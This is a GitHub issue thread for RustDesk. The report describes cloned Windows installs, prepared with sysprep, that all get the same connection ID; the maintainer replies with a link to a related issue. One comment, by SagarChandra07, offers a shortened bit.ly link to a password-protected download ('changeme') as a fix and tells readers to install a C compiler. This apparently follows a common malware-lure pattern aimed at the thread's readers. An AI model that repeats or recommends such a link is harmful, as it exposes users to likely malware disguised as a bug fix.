### ISSUE TITLE
Rustdesk may generate the same connection ID for different machines

### ISSUE THREAD

**Issue by tzming** [rustdesk/rustdesk#9511]
### Bug Description

I used sysprep to create a Wim installation package for a host with the same hardware and pre installed Rustdesk in the system. I found that a large number of system replicas running Rustdesk provided the same connection ID, which made it difficult for me to accurately connect to the expected computer when using that ID to connect
P. S: I used a self built server as a relay server for Rustdesk

### How to Reproduce

Batch installation of operating systems with rustdesk pre installed encapsulated by sysprep

### Expected Behavior

Rustdesk replaces more accurate algorithms when generating unique IDs, such as unique machine codes, CPU IDs, etc

### Operating system(s) on local side and remote side

windows10 -> Ubuntu(Server) -> windows10

### RustDesk Version(s) on local side and remote side

1.3.0

### Screenshots

![微信截图_20240929100325](https://github.com/user-attachments/assets/507fd50b-9b0b-4299-bfcd-8a7cc99bc354)

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by rustdesk** [comment]
https://github.com/rustdesk/rustdesk/issues/9082
